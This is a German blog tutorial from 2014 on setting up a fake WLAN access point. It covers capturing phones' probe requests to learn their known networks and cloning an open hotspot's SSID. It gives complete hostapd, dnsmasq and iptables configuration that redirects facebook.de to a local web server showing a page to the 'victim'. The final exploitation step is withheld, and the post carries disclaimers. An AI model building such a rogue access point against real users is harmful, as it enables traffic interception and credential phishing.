Falscher Accesspoint

Sollte ein Netzwerk so gut gesichert sein, dass man in dieses nicht eindringen kann, muss man sich einer anderen Strategie bedienen. Hierzu benötigt man ein bisschen Grundverständnis von der Arbeitsweise der eingesetzten Geräte.

Warnhinweis:
Diese Informationen dienen ausschließlich und ausschließlich nur für Lehr- und Bildungszwecke. Ich dulde keinerlei illegale Aktivitäten und übernehmen auch zu keiner Zeit irgendeine Verantwortung für Handlungen jeglicher Art, welche durch diese Informationen durchgeführt wurden!

Anwender, die sich nicht mit dem Thema IT-Sicherheit befassen, lassen absolut die Finger von Nessus Scanner und/oder ähnlichen Tools, da diese nach Inkrafttreten des sogenannten Hackerparagrafen (§ 202c StGB) in Deutschland als Computerprogramm zum Ausspähen von Daten aufgefasst werden und somit allein schon der Besitz in Deutschland unter Strafe steht, wenn keine Berechtigung vorliegt.

Warning:
All the information displayed on my site are for learning or educational purposes only! I do not condone any illegal activity and take no responsibility at all for actions performed by anyone!

Am Beispiel eines falschen WLAN Accesspoints
Ein Wireless Access Point ist ein drahtloser Zugangspunkt, welcher eine Schnittstelle für kabellose Kommunikationsgeräte ist. Hiermit wird eine Verbindung zum Netzwerk / zur Kommunikation mit anderen Geräten hergestellt. Damit diese Kommunikation einwandfrei und möglichst mit hohem Durchsatz geschieht, suchen sich die einzelnen Geräte immer die beste Verbindung. Gibt man den Geräten nun mehrere Accesspoints zur Auswahl, suchen sich diese die beste/schnellste Verbindung. Diese Grundlage kann nun ausgenutzt werden, indem man einen Accesspoint kopiert und näher an des Gerät des Opfers bringt. Nun kommt es zu einer technisch vorgesehenen Optimierung der Verbindung, das Gerät des Opfers, verbindet sich mit dem näher liegenden Accesspoint, da dieser eine stabilere / schnellere Verbindung darstellt.

Die Vorgehensweise
1) Finde Informationen
2) Biete eine böse Alternative
3) Nutze aus

[xyz-ihs snippet=“ad“]

1) Finde Informationen und kenne dein Ziel
Als erstes wird wie immer das Ziel abgesteckt um nicht darüber hinaus zu schießen oder wahllos im nichts rum zu stochern. Hierzu ist es wichtig einige Eckdaten des anzugreifenden (mobielen) Gerätes zu kennen. In erster Linie muss man wissen mit welchen Netzwerken sich das Device über WLAN verbindet um mit diesen Informationen einen gefälschten Accesspoint zu erstellen. Hierzu bietet sich mcbeacon an, ein Programm welches eigentlich nur zuhört und die Informationen / Anfragen, welche die WLAN Clients von sich geben aufzeichnet. Die Clients fragen in zyklischen Abständen (meisst 10 mal in der Sekunde) nach bekannten Accesspoints in der Umgebung. Lässt man nun mcbeacon diese Daten Aufzeichnen, bekommt man die MAC-Adresse des WLAN-Clients, Name des WLAN-Clients und seine bekannten Netzwerke heraus.

Hier ein Beispiel:

11:22:33:44:55:66 [Tom's iPhone] (00:07-00:32)                                     'eduroam'
                                     'Homenet'
                                     'Holiday Inn'
                                     'open Guest wlan'
                                     'McDonalds'

Nun muss man nur noch recherchieren, welches Netzwerk sich am besten für einen Angriff unter falscher Flagge anbietet. Am einfachsten sind Hostspots, welche unverschlüsselt sind, hier wäre dies der offene Hotspot von McDonalds.
2) Biete eine böse Alternative
Nach dem ja die Wahl getroffen wurde, geht es darum, einen falschen Accesspoint zu erstellen. Die böse Alternative, welch dann dazu verwendet wird um auf den Rechner des ausgewählten Opfers zu kommen. Um einen solchen Faked Accesspoint am einfachsten zu realiesieren, bieten sich Programme wie das bekannte SET (Social Engineering Tool) an.
Oder man baut sich nach den eigenen Bedürfnissen einen eigenen Hotspot mit hostapd, dnsmasq, iptables und nginx.

Aufsetzen des Accesspoints unter Linux:

Installation:
Software zum erstellen eines Accesspoints installieren, iw dient zur Konfiguration:

apt-get install hostapd dnsmasq nginx

hostapd dient zum erstellen, des eigentlichen Hotspots
dnsmasq ist ein  DNS-Forwarder und DHCP Service hiermit werden Regeln erstellt
nginx ist ähnlich wie Apache nur meiner Meinung besser geigten

[xyz-ihs snippet=“ad“]

Konfiguration:
Hierzu wird folgende Datei mit einem Editor Ihrer Wahl verändert:

sudo vi /etc/hostapd/hostapd.conf
interface=wlan0
driver=nl80211
ssid=McDonals
channel=7

Ich denke das oben ist selbsterklärend, dass es wie Schnittstelle wlan0 für den Accesspoint verwenden möchte und die ssid McDonals heißen soll.

Nun stellen wir den DHCP Server ein:

sudo vi /etc/network/interfaces
auto lo

iface lo inet loopback
iface usb0 inet dhcp

iface wlan0 inet static
address 155.20.0.1
netmask 255.255.255.0
broadcast 255.255.255.255
pre-up iptables-restore < /etc/iptables.rules

dies sollte alles Selbsterklärend sein

[xyz-ihs snippet=“ad“]

Nun müssen wir hostapd noch sagen, wo er das Konfigurations Skript findet, dazu geben wir folgendes in das Terminal ein:

sudo vi /etc/init.d/hostapd

und Tragen unter DAEMON_CONF= den Pfad /etc/hostapd/hostapd.conf ein.

DAEMON_CONF=/etc/hostapd/hostapd.conf

Nun müssen wir noch die Verhaltensregeln erstellen, was passieren soll, wenn eine URL nach dem verbinden mit unserem Hotspot aufgerufen wird passieren soll.

sudo rm /etc/dnsmasq.conf
sudo vi /etc/dnsmasq.conf
log-facility=/var/log/dnsloging.log
address=/facebook.de/155.20.0.1
interface=wlan0
dhcp-range=155.20.0.5,155.20.0.250,12h
no-resolv
log-queries

 log-facility hier gibt man einen Pfad zu einer Datei an, wo man den Log haben möchte
address wie die verschiedenen aufgerufenen URLS geleitet werden sollen in meinem Beispiel wird man beim Aufruf von der Domain facebook.de auf 155.20.0.1 geschickt, welches der Webserver des Accesspoints ist.
interface gibt an, welche Schnittstelle verwendet werden soll
dhcp-range den zu vergebenden IP Adressraum mit Gültigkeitsraum

[xyz-ihs snippet=“ad“]

Jetzt ist alles so eingestellt, dass man z.B. bei Aufruf von facebook.de auf den nginx Server geschickt wird. Nun kann man in den Ordner /usr/share/nginx/www/ eine index.html Datei legen, welche dann dem Opfer gezeigt wird.

Als letztes erstellen wir noch die Regeln für die iptables:

sudo iptables -F
sudo iptables -i wlan0 -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
sudo iptables -i wlan0 -A INPUT -p tcp --dport 80 -j ACCEPT
sudo iptables -i wlan0 -A INPUT -p udp --dport 53 -j ACCEPT
sudo iptables -i wlan0 -A INPUT -p udp --dport 67:68 -j ACCEPT
sudo iptables -i wlan0 -A INPUT -j DROP

sudo sh -c "iptables-save > /etc/iptables.rules"

Nun werden nur tcp Anfragen an Port 80, udp Anfragen auf Port 53 und 67-68 bearbeitet.
Alle anderen Anfragen werden verworfen. mit dem Befehl:

sudo update-rc.d nginx defaults
sudo update-rc.d hostapd defaults
sudo update-rc.d dnsmasq defaults

Werden dann alle vorgenommenen Einstellungen aktiviert. Ein darauf folgender Neustart wird empfohlen, damit alle beötigeten Module und Services geladen werden.

[xyz-ihs snippet=“ad“]

3) Nutze aus
Dieser Punkt wurde aus rechtlichen Gründen entfernt.

© 2014 Raffael Haberland
projekte.haberland.it, info@haberland.it

Ersten Kommentar schreiben

Antworten

Deine E-Mail-Adresse wird nicht veröffentlicht.


*